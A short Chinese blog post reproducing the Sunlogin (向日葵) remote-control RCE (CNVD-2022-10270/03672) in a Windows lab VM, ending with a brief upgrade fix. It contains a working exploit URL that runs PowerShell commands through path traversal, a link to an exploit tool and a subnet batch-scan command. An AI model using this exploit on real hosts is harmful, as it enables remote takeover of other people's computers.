上海貝銳信息科技股份有限公司的向日葵遠控軟件存在遠程代碼執行漏洞（CNVD-2022-10270/CNVD-2022-03672），影響Windows系統使用的個人版和簡約版，攻擊者可利用該漏洞獲取服務器控制權。

影響版本：

向日葵個人版?? for Windows <= 11.0.0.33
向日葵簡約版?? <= V1.0.1.43315（2021.12）

實驗環境 ：win10虛擬機

工具下載(含有漏洞版本的向日葵)：
https://github.com/Mr-xn/sunlogin_rce/releases/tag/new

開始復現：

一，工具自動掃描

?打開cmd

?成功

?二、nmap手操掃描

?三，手動檢測

一個個試IP

http://IP:端口號/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami

?獲取信息

也可以kali自動批量掃描

python3 1.py -t 192.168.110.234/25

kali工具

解決

?點我進入官網下載新版

參考：CNVD-2022-10270/CNVD-2022-03672 向日葵RCE復現

總結

以上是生活随笔為你收集整理的远程控制漏洞CNVD-2022-10270/CNVD-2022-03672 向日葵RCE复现与解决的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。